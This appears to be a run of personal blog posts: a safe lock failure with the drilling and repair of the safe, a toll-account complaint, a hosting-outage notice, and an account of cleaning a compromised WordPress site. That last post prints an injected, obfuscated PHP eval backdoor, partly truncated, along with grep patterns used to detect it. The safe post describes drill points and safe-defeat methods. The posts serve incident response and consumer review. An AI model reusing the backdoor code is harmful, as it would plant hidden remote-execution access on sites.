Liberty Safes, A Review Like No Other…

So those of you who are friends with me on Facebook may be familiar with a recent predicament that had unbelievable timing, and not in a good way.  I have a series of lessons that many of you can learn from, as well as a detailed account of the warranty process behind Liberty Safes and S&G locks.

First let me detail what I had and what happened.  Here is my safe pre-issues.

Liberty Safe

That is a 50 CF Liberty Presidential safe.  It has an S&G Titan Direct Drive lock.  I could go into details now about the different security mechanisms, but I will get to that a bit later.  The way the direct drive works is you punch in the code, a solenoid fires, and you can then rotate the outer dial, unlocking the bolt.

As my wife and I were packing up the house for the first weekend of the big move, she discovered a few items she needed to put in the safe.  She went out to the safe and then came and found me a couple of minutes later: “I think I forgot the combo,” she said.  Interesting, I’ll go and try.  I walk out to the safe, punch in the code, no click, nothing; 5 seconds later it beeps as if it relocked.  Odd, try it again, same thing.  Try leaning on the door, doing everything in the list of stuff to do to get the safe open on their website.  No joy.  Further, I know it’s the right code, because when I punch in a wrong one as a test I get immediate error feedback.

So, we are on a timetable, and we figure we’ll call Liberty next week, schedule an appointment with a locksmith, and drive back out for it.  Well folks, here’s a customer service fail and a lesson for you all if you ever find yourself needing to call Liberty.

First Lesson:

Don’t try to start a support chain by email.  I sent an email to their support contact and NEVER heard back. We turned around and called 24 hours later.

Second Lesson:

Have your safe’s serial number on hand.  It is on the packet of information that comes with the safe and is also on the inside of the door.  Do NOT count on registering your safe to save you.  I figured they could look my safe up since I had registered it; they could not.  Pissed barely begins to describe my attitude, as I had to drive 5.5 hours back to the redoubt in the wheat field, hoping I could find the packet of safe info with the serial number on it.  Did I mention I was in the middle of moving and had packed up a decent chunk of my office?  Luckily I had not moved that box yet and was able to find it.  I called Liberty and everything went quickly, changing my attitude from pissed off to mildly annoyed.  It was Thursday, and the locksmith would be out on Saturday.

Getting into the safe:

The locksmith arrives Saturday morning, takes one look at the safe, and says, “Well shit!  That’s not the lock they told me was on there.”  We take the dial off and try a new one.  We bang on the door with a mallet trying to make sure nothing is stuck.  Alas, my suspicions were correct.  We would have to drill my safe, and they had given him the wrong lock type.

This has numerous impacts on things like drill points and design of operation.  He calls a buddy of his, gets the info he needs, and we set to work.

20140412_120637

So behind this steel door are numerous traps and issues that can cause problems for people trying to break into a safe.  What kind of traps?  Ball bearings are the most notorious of the bunch.  What do they do to drill bits I hear you ask?  This:

20140412_125406

 

We chewed up 8 drill bits that Saturday, and it took us 3 hours to get through into the lock case.  Ah, but we got into the lock case!  FYI, we did have to swap out for a corded hammer drill.  Here’s a view of what those little bastards look like in the safe.

20140412_134221

Another drill bit that died trying to reach the lock case.

20140412_194831

So we’re in; the safe should just open now, right?  Well, no such luck.  You see, the numbers we had for the drill point were off by about an eighth of an inch.  We found the solenoid in the hole, but there was a vertical bar behind it too.  Here’s a picture of the inside of the lock; you’ll probably immediately figure out what we didn’t know.  A picture is worth a thousand words.

20140418_101715

So looking at that image, you have the solenoid (the grey box with Summit written on it), the actual movable part (the wider shaft), and then the fixed shaft it moves on (the thinnest piece).  The solenoid moves, allowing the large metal bar to move up and down vertically.  That brass part turns, causing the bar to rise.  We drilled in about an eighth of an inch too far to the left.  We were smack on top of the fixed shaft but didn’t know it.  We then punched through to the back to see if the re-closer had possibly fired; it hadn’t.  In so doing we had severed the metal piece we needed to raise.

At this point we decided to call it and continue this week, mainly so he could find the diagram I have above and figure out exactly what was going on.  Yesterday morning he arrived about 9am.  We drilled a slightly larger diameter hole to the depth of the piece we needed to manipulate.  Grabbing metal that is flush with a hole is difficult; we chewed up 3 more bits in that process.  Then finally we start grabbing the metal, but it still won’t pull up.  I had the idea to find the solenoid and push on it some more, just in case it wasn’t actually clear.  Bang!

20140418_115948

It’s open, now what?

So now that the safe is open, we needed to remove the old lock, patch and harden the hole we made, install the new lock and then we’re done.  First we needed to remove the safe door backing.

20140418_121211

Next we see the inside.

20140418_121743

I have some observations on the interior of the door, along with disassembly, which I will get to later.  But you can see the old lock in the middle.  You can see the external re-closer to the left of the lock as well.  You will also note there is a diagonal bar running from just to the left of the lock down to the floor on the right side of the door.  First we needed to remove the old lock; easy enough, pull three screws and it’s off.

20140418_122839

You can see something covering the hole.  That’s because in this photo we’ve started to repair the safe.  We’ve packed the hole from the back side full of a steel-based epoxy putty.  Then from the front we add 2 more things, with putty interspersed.

20140418_122945

That is a hardened steel ball bearing about the same diameter as the hole we had to drill.  That however wasn’t enough for my locksmith.  He added this little jewel.

20140418_123104

That is going to seriously suck for whoever hits it with a drill.  It is a combination of carbide and steel and had to be tapped into place.  Basically, your drill bit is going to have serious issues with that hole.

But Barron, the hole is still there, right?  Yup, and useless: since I am switching lock types, the position to drill for the new lock is different.  Basically someone is going to put in all that effort and be disappointed in the end.

So now we install the new lock, this time a mechanical dial; the whys will be fully covered at the end.

20140418_125138 20140418_125309

We set the combination and he even left me the key so I can change it again later if I so choose.  It actually isn’t terribly difficult to do.  So what does the safe look like after all that?

20140418_135418

 

You can’t even see the drill point as it’s under the dial.  So now that we see what all I went through to get this detailed review, let’s go over all the things I’ve learned, my observations, what I learned from the locksmith, and any advice that I can give.

Lessons Learned:

As I mentioned at the beginning keep that damn serial number on hand.  Preferably store it in a digital form that can be accessed even in the middle of a move.  I still think Liberty should have been able to look up the info given my registration but don’t count on it.  Just store that serial number where you can find it.

Locks:

Next up: digital locks.  Avoid them like they will fail you, because they will.  I got that digital lock after seeing better reviews than the earlier motorized version received.  The locksmith informed me that the reason the previous version had so many issues is that they used plastic for the gearing inside, and it would strip.  They still haven’t altered that design.  The direct drive overcame this problem.

(Well damn, I forgot to take a picture of the inside of the original dial.)  If I had known from the start that the digital lock was made in China, I would never have bought it.  That picture would have helped in figuring out exactly what happened; regardless, here’s a picture inside my butchered lock for variety.

20140418_124420

See that orange cylinder in the corner?  Yeah, that’s an electrolytic capacitor, my guess being to keep the voltage up while the relay opens.  Problem is, those types of capacitors aren’t known to last forever, far from it.  No thanks.  I figure the design is made to die shortly after the warranty goes Tango Uniform.  I got lucky and got one that failed early.

Further they’re prone to other types of failures as well.

Warranties:

Here’s a dirty little secret that no one ever tells you.  That 5 year warranty on your lock is from the date of manufacture, not the date of sale.  Safe manufacturers do this because the lock manufacturers do it to them.  A lock failure ultimately means your safe is getting drilled, thus someone is going to have to foot the bill.  Liberty, like most other companies, and understandably, doesn’t want to be stuck with the bill for the failure of someone else’s product.

So again, go with the mechanical lock.  While they can fail, they are considerably more reliable, especially when properly maintained.

Lock Maintenance:

The safe companies recommend having your lock serviced once a year.  My locksmith said that, truthfully, for most people it’s more like every 5 years.  It’s worth doing because there are a few parts that should be inspected, just to ensure the discs don’t slip within the mechanical lock.

Safe Security:

It took us over 3 hours with the proper equipment to drill into the lock case; in total it was about a day’s worth of work to get it open, given we were off in our measurements.  That’s also with detailed information on where to drill.  Overall I’d say this was one tough nut to crack and isn’t going to be cracked by your average burglar.

That said, the locksmith did inform me that criminals are now using gas-powered and battery-powered cutoff wheels to cut through the sides or back of the safe, since they are not as heavily hardened.  Jewelers’ safes counter this by pouring concrete into the walls; mixed into that concrete are rebar, carbide chunks, aluminum, and copper.

To give you a bit of background on my locksmith: he’s been doing this since he was in the Navy back in the ’70s.  He’s worked on government safes, locks, SCIFs, etc.  He knows his stuff, and he pointed out that good safes are often destroyed by amateur locksmiths.

Remember, the goal of a safe is not to be impenetrable, but to buy time.  This safe bought a lot of time even against someone who knew what he was doing and had the details in advance.

What has me upset:

Well, beyond the fact my lock failed, which frankly doesn’t have me happy, it’s what I discovered as we pulled it apart and chatted with the locksmith.

First up is this failure.

20140418_125420

Yes, that is a gap in the fire board.  Sure, there are another 2 layers underneath, but it doesn’t inspire confidence in those 3 layers.  A simple strip of the heat-expanding tape would have worked well for that spot.

20140418_125309

So if you look at the end of the screwdriver, you will see a small rod heading diagonally toward the ground; I mentioned this earlier.  This is to prevent you from opening the bolts on your safe while the door is open.  However, this design has some issues and can result in the safe refusing to lock.  If this happens to you, feel around the bottom edge of the door farthest from the hinges; there will be a rod.  Push it up and pull it down to try to reset it.  If that doesn’t work, pull the cover off the door and look at the mechanism.

Further, on the website they give the following fire rating with no caveats:

Liberty

However if you look at the inside of the door to the safe you see the following:

SafeRating

*BTU rating based on 25cf safe

So does that mean a larger safe should have its rating degraded due to its size?

Conclusions:

Liberty does stand behind their safes.  They took care of all the costs involved with this repair.  Annoyingly, had this happened in July, I would have been on the hook for a lock replacement and the cost of the locksmith.  From chatting with the locksmith, Liberty is a respected brand, and my main issue here was that stupid lock, made by S&G.

Would I buy Liberty again?  I’m not 100% sure, because of those few quality issues I noticed, and this was on a $5000 safe.  I am going to be contacting Liberty specifically about the gap to see if they have any comment on the subject, not to mention the lack of detail about their fire ratings.  I will post an update if and when they get back to me.

Lastly, if you do have an issue, get a real locksmith.  Seriously, someone who is well skilled and trained.  Evidently many smiths won’t even get versions of the locks to play with on their own to figure out how they work.  If you’re in the Palouse area, I highly recommend Mike at George’s Lock and Key Service.

 

Evidently the State Doesn’t Want My Money…

So let me lead off with the email I’m sending GoodToGo as I type this:

So somehow I wasn’t notified as my account balance got low.  It’s now at -$0.35.  I just went to put money on it and am told “I can’t make a payment currently because the account is in negative balance.”

OK, I’ll try to call. I call and it wants some pin number that I don’t have and cannot find anywhere to set one on the website. I try to find a way to talk to a human and cannot find one.

So just to make sure I’m clear on this: I give an interest-free loan to GoodToGo (WA DOT), am finally notified only once I have a negative account balance because it’s run over, and when I try to go give another interest-free loan, I can’t?  If it weren’t for the fact this is “sanctioned by the state,” I’d be calling the BBB to report a scam.

Why would I report a scam?  Because at this point my assumption must be that the reason it is so difficult to pay off a negative account balance is to accrue interest against the user; in which case, why is my loan to the state an interest-free one?  And if not that, then it is to bill the user at a higher rate for using the toll bridge because my account is “out of order.”  This also ignores the fact that the first time I drove across the bridge I was billed through GoodToGo and also sent a paper bill at a higher rate in the mail.

I have updated to a different card, although I would prefer not to have automatic payments configured on that card; but if this is going to be the way the state behaves, I do not have much of a choice.

I had been making a habit of making one time payments when notified and this time I couldn’t.

As an additional note I will be forwarding this to my state representatives asking how this type of user interface and treatment of Washington State citizens is acceptable. Especially for those of us who purely use this in transportation to or from work. I will also be posting a copy of my experience and this letter, along with how the situation is handled on my blog.

Thank you and sincerely,
Barron Barnett

So for those not familiar with the GoodToGo system: you maintain a balance for toll roads around Western Washington.  When you take one, it subtracts from that balance.  When the balance gets low, it can automatically get more from a credit card or deduct from a bank account.

The initial credit card I was using has been disabled, not because of lack of payment or anything; it just has been, and I’m too lazy to call the bank and fix it.  I’m going debt free, so why bother worrying about it?  It forces me to not use the card.

So I had taken to paying with my debit card whenever I got a low-balance notice.  This time I got no low-balance notice at all until a call and an email about it this morning.  I go look at my account: -$0.35.  Well, I need to fix that.  I go into payments and see:

Outstanding Balance
Account balance is negative, payment not allowed. Please contact the Customer Service Center.

I then hop on the phone and start getting dragged through automated menus.  I finally get to one that sounds reasonable; it asks me for my account number, and I enter it.  Then it asks for a 4-digit PIN.  A what?  I never configured a 4-digit PIN, not that I remember anyway, and I cannot find anywhere in the online forms to view or configure one.

So let’s recap.  I’ve been giving interest-free loans to the State of Washington so that I can drive over public roads at a non-inflated price.  I guess you could say that’s the interest, but then some pay more interest than others, do they not, since that depends on how long it takes them to dwindle down their account balance; but I digress.

Evidently my account ran negative and I just discovered this.  I attempt to use the manual payment system and am told to contact the Customer Service Center.  I do exactly that, and am greeted with an automated system asking for information that I do not know and cannot find a method to find out or set.

Ultimately this leaves me in the following state: an outstanding balance I’m now aware of and unable to pay, because their system is so screwy I could swear it was built by the same idiots that made the Obamacare website.  And some would wonder why I don’t want my financial information stored within it.

And people wonder why I view the state as worthless and unable to pour piss out of a boot while reading the directions off the heel.  If I can’t pay them when I owe them money, what the hell do they need the money for in the first place?

Quote of the Day – Ry Jones (2/24/2014)

In WireShark I trust.
There is no evidence to support that claim.

Ry Jones
February 24th, 2014


[Yup.  As a geek this kicked over my giggle box.  Doubly so since I've been in that same position.

Well I don't care what you say, WireShark shows no traffic related to X when your process is running.  So your crap's broken, deal with it!

I've noticed it is a unique individual who will just willingly admit, "Yup I screwed up, give me a couple minutes so I can fix that." Most of the time people are more interested in saving face and making themselves not look bad.

I find it better to look good by admitting my mistake and fixing the problem, but that's just me.  -B]

Today’s hour long educational presentation…

Even if you don’t really speak tech, watch it.  He doesn’t really go into deep details, though it does require some understanding of how networking works.

If you still don’t want to take the hour let me synopsize it into one single sentence:

Nothing is safe.

And there isn’t much hope for immediate improvement either, because the NSA is leaning on organizations to leave a lot of this crap in place.  Not to mention they do not report security threats; instead they want them left open for exploitation.

There are a couple of things that desperately need to change; one of the biggest is that security needs to stop being an afterthought in software and systems development.  I’ve said it before, folks: we’re in a cold war, and one side just doesn’t want to admit the truth of the matter yet.

Zombies are Real and Infectious…

hacker-free-hack-the-planet-112296

That is of course unless you supply a couple well placed rounds to the upper cranial cavity once you discover their plight.

Let me start off at the beginning.  Over the past month I’ve been busy polishing off the last rough edges of my new VPS.  I’ve spent a lot of time securing it and going through everything I can to give myself the best probability of survival when the inevitable finally happens.

Last weekend I migrated Linoge and Weer’d over to the new server as well since I had finished hammering out the last of the kinks with the help of the LiquidWeb support team.

I moved Linoge over and had a few minor oddities, which I quickly fixed.  From there I set my sights on moving Weer’d.

I logged in, dumped the database, and tarred up the site.  The tar fails.  Odd, what do you mean you couldn’t read that file?  I didn’t think much of it; I found the file, and, odd, the permissions are 000.  This isn’t my site, though, and I’m not sure if there was something special done, so I fix it.  In total I fix 8 files like this.  I move the site over and get him set up on the new server.  It actually went even smoother than Linoge and didn’t require a weird step.
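For anyone who hits the same wall, here’s a minimal sketch of finding and fixing unreadable (mode 000) files before tarring up a site.  The demo uses a scratch directory rather than a real site path, and the file name is just a stand-in:

```shell
# Demo setup: a scratch directory standing in for the site root, with one
# file whose permission bits have all been stripped (mode 000).
site=$(mktemp -d)
touch "$site/wp-config.php"
chmod 000 "$site/wp-config.php"   # a non-root tar can't read this

# List regular files with no permission bits set.
find "$site" -type f -perm 0000

# Restore a readable default (644) so tar can archive them.
find "$site" -type f -perm 0000 -exec chmod 644 {} +
```

On a real site you’d point find at the document root and eyeball the list before chmodding anything; a pile of 000-permission files in a web tree is itself a red flag, as I found out the hard way.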

Fast forward 24 hours to when I begin my evening log check.  I run tail /var/log/messages.  What I see does not provide me comfort.

May  5 22:34:06 clark suhosin[26061]: ALERT - script tried to increase memory_limit to 268435456 bytes which is above the allowed value (attacker '66.249.76.207', file '/home/weerd/public_html/wp-includes/post-template.php', line 694)

May  5 22:34:06 clark suhosin[26061]: ALERT - script tried to increase memory_limit to 268435456 bytes which is above the allowed value (attacker '66.249.76.207', file '/home/weerd/public_html/wp-includes/post-template.php', line 694)

What!?  I promptly dump open that file and am greeted by the following:

/**
 * Applies custom filter.
 *ap
 * @since 0.71
 *
 * $text string to apply the filter
 * @return string
 */
function applyfilter($text=null) {
  @ini_set('memory_limit','256M');
  if($text) @ob_start();
  if(1){global $O10O1OO1O;$O10O1OO1O=create_function('$s,$k',"\44\163\75\165\162\154\144\145\143\157\144\145\50\44\163\51\73\40\44\164\141\162\147\145\164\75\47\47\73\44\123\75\47\41\43\44\45\46\50\51\52\53\54\55\……………\164\56\75\44\143\150\141\162\73\40\175\40\162\145\164\165\162\156\40\44\164\141\162\147\145\164\73"); if(!function_exists("O01100llO")){function O01100llO(){global $O10O1OO1O;return call_user_func($O10O1OO1O,'od%2bY8%23%24%3fMA%2aM%5dnjjMjBBPP%3eF%27VzBPp%5ez1h%27%27hIm%2bKKbC0XJ%5e%3b%60%40Bd44d%22%2eULLtT1MMZf%3eZSRt%22%2a%2a0y%5cjj%291%………………….%3eBhG%27%7dl',6274);}call_user_func(create_function('',"\x65\x76\x61l(\x4F01100llO());"));}}
  if($text) {$out=@ob_get_contents(); @ob_end_clean(); return $text.$out;}
}

Now, for those who may not realize it, that odd text in there I immediately recognized as obfuscated code… that was in the middle of a standard WordPress installation.  Das Not Good.  Promptly I shifted into Defcon 2, the good news was the IP in the log was Google crawling the site.  I promptly bump an email to Weer’d along with everyone else about this new Charlie Foxtrot.

I have no idea how severe this incident is; at this point I trust absolutely no one.  My first order of business is to close the hole that I now see.  I manually reinstall WordPress, overwriting ALL the existing files on the server.  This promptly stops those messages in my log.  Something new happens though.

Weer’d has the WordFence security plugin (fantastic plugin, and I highly suggest it), so I run a scan; it says nothing is wrong.  I call BS.  There is no way that’s it.  I do a diff with another site that is known good and discover a pile of files.
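That diff trick is easy to replicate.  A rough sketch, with two scratch directories standing in for the live site and a known-good copy of the same software version (the file names here are made up):

```shell
# clean: a pristine copy of the software; live: the suspect tree.
clean=$(mktemp -d)
live=$(mktemp -d)
printf 'original\n' > "$clean/index.php"
printf 'tampered\n' > "$live/index.php"   # stock file modified in place
printf 'payload\n'  > "$live/x7f2a.php"   # file the attacker added

# -r recurse, -q report only which files differ or exist on one side.
diff -rq "$clean" "$live" || true
```

Files reported as differing are candidate injections; “Only in” entries on the live side are candidate shells or droppers.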

image

There’s the list in a little more file-friendly form.  I promptly removed and reinstalled the WordFence plugin.  This is where things get interesting.  I see this in the scan output:

Mon, 06 May 13 02:45:03 +0000::1367822703.7602:2:info::Adding issue: This file appears to be an attack shell

Mon, 06 May 13 02:45:03 +0000::1367822703.7594:2:info::Adding issue: This file appears to be an attack shell

And I had to keep running the scan over and over.  I finally just resort to nuking everything, double checking from a shell and then reinstalling what I do actually want to keep.  Overall this is very little.  Every time I run a scan after fixing something I find something new.  Eventually I discover that the theme has been compromised.  Dump the theme and replace it.  Overall there were both stock WordPress files that were compromised along with additional files that were added but made to look legitimate.
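If you’d rather not trust any one scanner, a crude grep sweep for the usual obfuscation primitives catches a lot of this class of injection.  A sketch only (the planted file name is made up), and expect false positives in legitimate code:

```shell
# Demo tree: one clean file and one file using the kind of call the
# injected code relied on (eval of encoded data).
site=$(mktemp -d)
printf '<?php echo "hello";\n' > "$site/ok.php"
printf '<?php eval(base64_decode($p));\n' > "$site/header-cache.php"

# -r recurse, -l print matching file names only, -E extended regex.
grep -rlE 'create_function|eval\(|base64_decode|gzinflate' "$site"
```

Anything this flags gets eyeballed by hand; plugins legitimately use some of these functions, which is exactly what the malware counts on.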

After a short while I had the site cleaned up.  I will do a more thorough cleaning, but that was the immediate-action remedy at 0-dark-30 in the AM Sunday night.

I do, however, want to investigate the details of this.  I log in to the old server and start looking around.  All the exploits are still present, which means the compromise predates the move.  Then I look at the root directory:

clip_image002

Do you see it?  Here’s the dump of what’s inside:

clip_image002[4]

Now if you pay close attention you can glean a few important facts from the above.  First, they had multiple exploits in place to get back in.  Second, they had obtained root access on the box.  In hindsight I noticed a few things (other than the interesting file name that should have been a giant fucking red flag), such as .bash_history not working correctly.  Lastly, we can note the date of the last edit: October 5th, 2012.
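File modification times are how you date an intrusion like this, though attackers can forge them, so treat mtimes as a hint rather than proof.  A sketch using GNU touch and find (the back-dated file name is made up):

```shell
# Demo: one ordinary file and one with a back-dated modification time,
# like the dropped files on the old server.
dir=$(mktemp -d)
touch "$dir/normal.php"
touch -d '2012-10-05' "$dir/dropped.sh"

# GNU find's -printf emits mtime and path for everything in the tree.
find "$dir" -type f -printf '%TY-%Tm-%Td %p\n' | sort
```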

There’s a reason that rang a bell with me.  From an article dated Oct 3, 2012:

The distributed denial-of-service (DDoS) attacks—which over the past two weeks also caused disruptions at JP Morgan Chase, Wells Fargo, US Bancorp, Citigroup, and PNC Bank—were waged by hundreds of compromised servers. Some were hijacked to run a relatively new attack tool known as "itsoknoproblembro." When combined, the above-average bandwidth possessed by each server created peak floods exceeding 60 gigabits per second.

More unusually, the attacks also employed a rapidly changing array of methods to maximize the effects of this torrent of data. The uncommon ability of the attackers to simultaneously saturate routers, bank servers, and the applications they run—and to then recalibrate their attack traffic depending on the results achieved—had the effect of temporarily overwhelming the targets.

It appears I found a zombie sleeping in my friend’s place and inadvertently moved him.  That’s OK though; upon finding him I filled him full of 00 buckshot and did a mag dump from the AR for good measure.  I will also be killing the entire area with fire when I get a bit more free time.

My actions, though, are leaps and bounds beyond what Dreamhost is doing, and remember, they’re the ones who actually suffered a data breach and have a server where root was compromised.

Thank you for writing.  Let us assure you that you’re not on your own!  We’re here to guide you through this process as much as we possibly can.  By the time you’re reading this email we have attempted to clean some basic rudimentary hacks out of your account and fix any open permissions; any actions taken will be noted below.
Going forward, we need you to take care of some basic site maintenance steps to ensure that your account has been secured.  To get started, please read and act on all of the information in the email below.  Since it involves editing and potentially deleting data under your users we are not able to complete all tasks for you.  If you have questions about the noted items please provide as much information and detail as possible about where you are getting stuck and we will do our best to assist you.
Here’s another area where we’re able to help — if you would like us to scan your account again for vulnerabilities after you have completed some or all of the steps below, please reply to this email and request a rescan and we can then verify your progress or if there are any lingering issues.
Most commonly hacking exploits occur through known vulnerabilities in outdated copies of web software (blogs, galleries, carts, wikis, forums, CMS scripts, etc.) running under your domains.  To secure your sites you should:
1) Update all pre-packaged web software to the most recent versions available from the vendor.  The following site can help you determine if you’re running a vulnerable version:
– Any old/outdated/archive installations that you do not intend to maintain need to be deleted from the server.
You should check any other domains (if applicable) for vulnerable software as well, as one domain being exploited could result in all domains under that user being exploited due to the shared permissions and home directory.
2) Remove ALL third-party plugins/themes/templates/components after upgrading your software installations, and from those that are already upgraded under an infected user.  After everything is removed, reinstall only the ones you need from fresh/clean downloads via a trusted source.  These files typically persist through a version upgrade and can carry hacked code with them.  Also, many software packages come with loads of extra content you don’t actually use and make searching for malicious content even harder.
3) Review other suspicious files under affected users/domains for potential malicious injections or hacker shells.  Eyeballing your directories for strangely named files, and reviewing recently-modified files can help.  The following shell command will search for files modified within the last 3 days, except for files within your Maildir and logs directories.  You can change the number to change the number of days, and add additional grep exception pipes as well to fine-tune your search (for example if you’re getting a lot of CMS cache results that are cluttering the output).
find . -type f -mtime -3 | grep -v "/Maildir/" | grep -v "/logs/"
In scanning your weerd user we found 3 hacked files that we were able to try and clean.  Backups of the original hacked files can be found at /home/weerd/INFECTED_BACKUP_1367876582 under your user, with a full list of the original files at /home/weerd/INFECTED_BACKUP_1367876582/cleaned_file_list.txt.  You should verify that your site is working fully after being cleaned and then delete the INFECTED_BACKUP directory fully.
Likely hacked code / hacker shells that we could not automatically clean were found under weerd here:
Likely hacked code / hacker shells that we could not automatically clean were found under jp556 here:
For information specific to WordPress hacks please see:
http://wiki.dreamhost.com/My_Wordpress_site_was_hacked
More information on this topic is available at the following URL under the "CGI Hack" and "Cleaning Up" sections:
http://wiki.dreamhost.com/Troubleshooting_Hacked_Sites

Seriously… A shared hosting server, not a VPS mind you, with evidence of a shell compromise that resulted in root access, and your response is, “Here, we’ll help you remove the malicious code from your site.”  Uh, already done that, sparky, but the bad news is that’s like closing the barn door after the cow has gotten out.  Or more specifically, closing and locking the front door after the serial killer has gotten into your house.  You really think those guys didn’t create backdoors in other sites?

The real reason we were informing you is that you have a breach which placed everyone with data on that server in danger.  I’m root; I can just go and place whatever exploit I want in whoever’s code I want.  I don’t think you understand why I had Linoge contact you, boy genius.

Yes, I understand you want to look good and not like a complete idiot in front of your customers.  You know what, though: “Pride goes before destruction, a haughty spirit before a fall.”  I was informing you because this is serious, and at least an acknowledgement of “thank you, we will get right on that” would be smart.  Try having to deal with constant outages and not being sure exactly why they’re happening.  It sucks; every time something goes wrong I think my forehead gets flatter from my desk.  Luckily at this point I think it’s solved, and today’s was a bit of an odd duck that only affected one site, but I digress.

Linoge informed me his server issues started late last September/early October and have continued right up to today.  Well, I’m sorry, but we have heavy signs of enemy action, and that is no coincidence.  That server is most likely still compromised at the root level, and it appears Dreamhost has no interest in fixing it.  With a shared host your attack surface is much larger and your odds of compromise increase; so does the damage from a root compromise.

So remember folks: digital zombies exist, they are contagious if you’re not careful, and they are best dealt with by a serious dose of heavy metal poisoning followed by a tactical nuke to the general vicinity.  Be very careful too; sites you may think are safe may have actually been compromised.  Now hopefully I can get all the other stuff I’m trying to get done and finally get some sleep.  Constant 0200 bedtimes with 0630 rise times are eating me whole.

How I know I moved to the right host

There have been teething issues over the past week.  I’m still working out a lot of the kinks, but there was a relatively big incident last Friday.  Let me just let my hosting provider give the overview of what happened, the analysis, and their corrective actions.

Dear Customer,

Earlier today, we had to perform emergency maintenance on a critical piece of power infrastructure. Our customers’ uptime is of critical importance to us and communication during these events is paramount.  At this time, power has been restored and servers are back online. Listed below is a timeline of events, record of ongoing communications, SLA compensation information and a detailed outline of the steps we’re taking to prevent against these issues in the future. If at anytime you have any questions please do not hesitate to call, email or chat.

Timeline of Events:

  • 11:00 – During a routine check of the data center by our Maintenance staff, the slight odor of smoke was detected. We immediately began a complete investigation and located the source of the smell; a power distribution unit in Liquid Web DC3, Zone B, Section 8 covering rows 10 & 11.
  • 11:05 – We discovered a manufacturer defect in the Power Distribution Unit (PDU).  This defect resulted in a high resistance connection which heated up to critical levels, and threatened to seriously damage itself and surrounding equipment.  This bad connection fed an electrical distribution panel which powers one row (Lansing Region, Zone B, Section 8, Row 11)  of servers which is part of our Storm platform.  We immediately tried to resolve the issue by tightening the connection while the equipment was still on, but it wasn’t possible. To properly resolve the situation and repair the equipment, we needed to de-energize the PDU to replace an electrical circuit breaker.
  • 11:15 – To avert any additional damage, we were forced to turn off the breaker which powered servers in Lansing Region, Zone B, Section 8, Row 11. All servers were shut down at this time.
  • 11:48 – Servers in Lansing Region, Zone B, Section 8, Row 10 began to be shut down.
  • 11:49 – Once it was safe to begin the work, we immediately removed the failed components and replaced them with spares.  We discovered that the failed connection was due to a cross threaded screw installed at the time of manufacture.  This cross threaded screw meant the connection wasn’t tightened fully, and resulted in a loose, high resistance connection which heated far beyond normal levels. Upon replacing the breaker, we re-energized the PDU and customer servers.  Our networking and system restore teams have been working to ensure every customer comes back online as soon as possible.
  • 12:52 – Power was restored and servers began to be powered back on.

Communication During Event

We know that in the event of an outage, communication is of critical importance.  As soon as the issues were identified we provided the following updates on the Support Page and an “Event” which emails the customer as well as provides an alert within the manage.liquidweb.com interface.

Event Notice on Support Page:

“We are currently undergoing emergency maintenance on critical power infrastructure affecting a small number of Storm servers in Zone B. Work is expected to take approximately 2 hours. During this event affected instances will be powered down. We apologize for the inconvenience this will cause. An update will be provided upon completion. “

Event Notice Emailed to Customers:

“We are currently undergoing emergency maintenance on critical power infrastructure affecting 1 or more of your Storm instances. Work is expected to take approximately 2 hours. During this event affected instances will be powered down. We apologize for the inconvenience this will cause. An update will be provided upon completion.”


SLA Compensation

Liquid Web’s Service Level Agreement (SLA) provides customers the guarantee that in the event of an outage the customer will receive a credit for 10 times (1,000%) the actual amount of downtime. From our initial research into this event it appears as though most customers experienced between 1 hour and 2 hours of downtime.  However, due to the disruptive nature of this event we are providing a minimum of 1 full day of SLA coverage for any servers that were affected by this event.  Please contact support if you have any additional information regarding this event or if you would like to check on the status of your SLA request.

Liquid Web TOS Network SLA
http://www.liquidweb.com/about/dedicatedsla.html

Network SLA Remedy
In the event that Liquid Web does not meet this SLA, Dedicated Hosting clients will become eligible to request compensation for downtime reported by service monitoring logs. If Liquid Web is or is not directly responsible for causing the downtime, the customer will receive a credit for 10 times ( 1,000% ) the actual amount of downtime. This means that if your server is unreachable for 1 hour (beyond the 0.0% allowed), you will receive 10 hours of credit.

All requests for compensation must be received within 5 business days of the incident in question. The amount of compensation may not exceed the customer’s monthly recurring charge. This SLA does not apply for any month that the customer has been in breach of Liquid Web Terms of Service or if the account is in default of payment.
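That 10x remedy is easy to sanity-check. Here’s a toy sketch of the credit math (my own illustration using a hypothetical $72/month server, not Liquid Web’s billing code), including the cap at one month’s charge from their terms:

```python
def sla_credit(downtime_hours: float, monthly_charge: float) -> float:
    """Liquid Web-style remedy: credit 10x (1,000%) the downtime,
    capped at the customer's monthly recurring charge."""
    hourly_rate = monthly_charge / (30 * 24)  # approximate hours in a month
    credit = 10 * downtime_hours * hourly_rate
    return round(min(credit, monthly_charge), 2)

# A 2-hour outage on a $72/month server earns 20 credit-hours, i.e. $2.00.
# Even a full week down can never credit more than the $72 monthly charge.
print(sla_credit(2, 72.0))    # 2.0
print(sla_credit(168, 72.0))  # 72.0
```

Which also shows why the voluntary “minimum of 1 full day of SLA coverage” above is considerably more generous than the letter of the SLA for a 1-2 hour outage.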


Moving forward

All PDU’s will be inspected for the same issue for all panels and all main breakers.

In this case, this PDU was just recently put into service.  When we purchase critical power equipment, the manufacturer performs an onsite startup procedure. This equipment check includes a physical inspection, phase rotation, voltage checks, alarm checks and many more.  This particular manufacturer defect didn’t avail itself until the PDU was under a significant amount of load.  Once the manufacturer defect began, the screw at the bus finger began to overheat. Once this overheating began, the resistance increased causing a serious risk of catastrophic failure.

Going forward, Liquid Web will perform additional tests, above and beyond our manufacturer startup procedures, on new equipment to look for manufacturer related defects and issues. We will now perform testing at full load by utilizing a Power Load Banking System.  This testing procedure was already in place for the vast majority of our power equipment but now will also include PDU specific testing.

Liquid Web performs preventative maintenance (PM) on all PDU’s.  This PM is an inspection that consists of current draw recording on all branch circuit breakers, infrared imaging of main connection points and on the transformers and a general inspection.  This is typically a quarterly inspection.

Yeah, I can’t argue with a company that honest.  Plus they go out of their way to help solve problems which technically may not even be their problem or responsibility. 

Oh, and I²R losses, as always, are a pain in the ass.
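For anyone whose circuits class is a distant memory: the heat generated in a joint is P = I²R, which is why a loose, high-resistance connection under heavy load cooks itself. A quick sketch with purely illustrative numbers (not figures from Liquid Web’s report):

```python
def heat_watts(current_amps: float, resistance_ohms: float) -> float:
    """Power dissipated as heat in a resistive connection: P = I^2 * R."""
    return current_amps ** 2 * resistance_ohms

# A sound bus connection might be on the order of 0.1 milliohm; a loose,
# cross-threaded one can easily be a couple orders of magnitude worse.
# At 200 A, that's the difference between a non-event and a space heater
# buried inside the panel:
print(heat_watts(200, 0.0001))  # ~4 W
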